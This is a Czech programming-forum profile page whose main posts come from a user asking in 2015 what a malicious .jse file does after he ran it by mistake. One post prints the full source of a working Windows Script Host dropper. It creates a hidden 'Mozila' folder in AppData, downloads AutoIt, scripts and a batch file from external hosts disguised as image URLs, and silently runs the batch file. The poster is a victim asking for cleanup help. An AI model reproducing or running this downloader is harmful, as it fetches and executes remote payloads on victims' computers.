Anonymní profil Ahert – Programujte.com
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu

Anonymní profil Ahert – Programujte.comAnonymní profil Ahert – Programujte.com

 

Příspěvky odeslané z IP adresy 77.236.192.–

Ahert
JavaScript, AJAX, jQuery › Co dělá tenhle kód
4. 12. 2015   #207048

P.S: Ten soubor jsem na pastebin nenahrál, jen jsem ho tam našel. Také jsem ho nenapsal - kdybych uměl javascript, neptám se tu co to přesně dělá..

Ahert
JavaScript, AJAX, jQuery › Co dělá tenhle kód
4. 12. 2015   #207047

Nechci nikomu škodit, píšu, že jsem omylem (svojí nepozorností/blbostí) otevřel soubor s tímto zdrojovým kódem - když jsem si pozdě všiml, že to má koncovku .jse tak jsem se podíval na zdroják a našel jsem tohle. Vytvořilo mi to složku v appdata s názvem Mozila a několika soubory uvnitř. Tu složku jsem smazal, soubor taky, ale zajímá mě jestli to dělá ještě něco - avast bohužel prospal a neobtěžoval se vyhodit ani jednu hlášku.

Zásadně nedoporučuji nikomu toto spouštět, ale ptám se jestli mám ještě něco hledat na odstranění po mém hloupém spuštění...

Ahert
JavaScript, AJAX, jQuery › Co dělá tenhle kód
4. 12. 2015   #207038

   

(function(c) {
    function a(a, b, pos) {
        if (!b || !a) return null;
        var d = WScript.CreateObject("Msxml2.XMLhttp");		
		d.onreadystatechange = function() {
		   if (d.readyState === 4 && d.status === 200) {
      xa = new ActiveXObject("ADODB.Stream");
      xa.open();
      xa.type = 1;
      xa.write(d.ResponseBody);
      xa.position = pos;

	stm2 = new ActiveXObject("ADODB.Stream");
	stm2.type = 1;
	stm2.open();
	stm2.write(xa.read());
	stm2.saveToFile(b, 2);
	stm2.close();
	xa.close();
		   }
		}
		
        d.open("GET", a, false);
        d.send(null);
    }
	function ekle(ustdosya,altdosya){{xa=new ActiveXObject("ADODB.Stream");xa.open();xa.type=1;xa.LoadFromFile(ustdosya);ix=new ActiveXObject("ADODB.Stream");ix.open();ix.type=1;ix.LoadFromFile(altdosya);stm2=new ActiveXObject("ADODB.Stream");stm2.type=1;stm2.open();stm2.write(ix.read());stm2.write(xa.read());xa.close();ix.close();stm2.saveToFile(ustdosya,2);stm2.close();}}
 
    fso = new ActiveXObject("Scripting.FileSystemObject");
    var e = new ActiveXObject("WScript.Shell");
    c = new ActiveXObject("Shell.Application" );
    FileDestr = e["ExpandEnvironmentStrings"]("%APPDATA%\\");
	mozklasor = FileDestr+"Mozila";	
	if(!fso.FolderExists(mozklasor)) { fso.CreateFolder(mozklasor); }
	c.ShellExecute("https://goo.gl/hMyuQd");
	sabittumb='.media.tumblr.com/47d1cf240d5a2bf213839fa3bb61f31a/tumblr_nw';
    a("https://36"+sabittumb+"9rw6Wltk1ui8al4o1_400.jpg", mozklasor+"\\Autoit.exe",10206);
    a("http://cutecatworldhappy.click/denes/bg.html", mozklasor+"\\bg.html",0);
    a("https://40"+sabittumb+"9s9iWADO1ui8al4o1_400.jpg", mozklasor+"\\ekl.au3",10206);
    a("https://41"+sabittumb+"9sbe1LSS1ui8al4o1_400.jpg", mozklasor+"\\ff.zip",10206);
    a("https://41"+sabittumb+"bz24iPSF1ui8al4o1_400.jpg", mozklasor+"\\force.au3",10206);
    a("https://40"+sabittumb+"9sgiNQ9p1ui8al4o1_400.jpg", mozklasor+"\\reg.au3",10206);
    a("https://40"+sabittumb+"9siiCxmJ1ui8al4o1_400.jpg", mozklasor+"\\sabit.au3",10206);
	a("http://cutecatworldhappy.click/denes/manifest.jpg", mozklasor+"\\manifest.json",0);
    a("https://41"+sabittumb+"gqfrSz821ui8al4o1_400.jpg", mozklasor+"\\run.bat",10206);
	a("http://cutecatworldhappy.click/denes/up.jpg", mozklasor+"\\up.au3",0);
    ekle(mozklasor+"\\force.au3" , mozklasor+"\\sabit.au3");
    ekle(mozklasor+"\\reg.au3" , mozklasor+"\\sabit.au3");
    ekle(mozklasor+"\\ekl.au3" , mozklasor+"\\sabit.au3");
	c.ShellExecute(mozklasor+"\\run.bat", "", mozklasor, "", 0);
	//c.ShellExecute(mozklasor+"\\Autoit.exe", '"' + mozklasor+"\\ekl.au3" + '"', "", "", 0);
	
	
})(this);
Ahert
JavaScript, AJAX, jQuery › Co dělá tenhle kód
4. 12. 2015   #207037

Není to link na soubor, je to link na zdrojový kód....jenom text. Není tam žádný exe či jiný typ spustitelného souboru.

Ahert
JavaScript, AJAX, jQuery › Co dělá tenhle kód
4. 12. 2015   #207025

Jinak chápu to správně, že AVG tě nepustí ani na pastebin? Nemohl bys to na chvíli hodit do výjimek?

Ahert
JavaScript, AJAX, jQuery › Co dělá tenhle kód
4. 12. 2015   #207024

Bohužel jsem otevřel soubor a pozdě jsem si všiml, že přípona .avi není skutečná přípona (pravá byla .jse). Zdrojový kód byl identický s tímto. Avast to bohužel nezachytil. Proto se ptám co přesně to dělá.

Ahert
JavaScript, AJAX, jQuery › Co dělá tenhle kód
4. 12. 2015   #207022

Chápu správně, že to vytvoří složku Mozila v appdata a do ní nastahuje Autoit? V případě, že jsem hloupě otevřel soubor s tímto kódem, stačí smazat tu složku co to vytvořilo?

Ahert
JavaScript, AJAX, jQuery › Co dělá tenhle kód
4. 12. 2015   #207020

Ahoj, chtěl bych se zeptat co dělá tenhle kód:

http://pastebin.com/KwBgAgZw

předem děkuji.

Vzdělání › Informatika Praha, Brno nebo…
19. 1. 2012   #152522

#22 Andrea

Jestli myslíš Aplikovanou informatiku na UHK, tak bych doporučil spíš Informační management na FIM, základy programování(obecne, Java), UML, databází a sítí (Cisco akademie) tam najdeš, vzhledem k tomu, že tvrdíš že máš "základní znalosti", tak by to mohlo být to pravé pro tebe.

 

 

Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032021 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý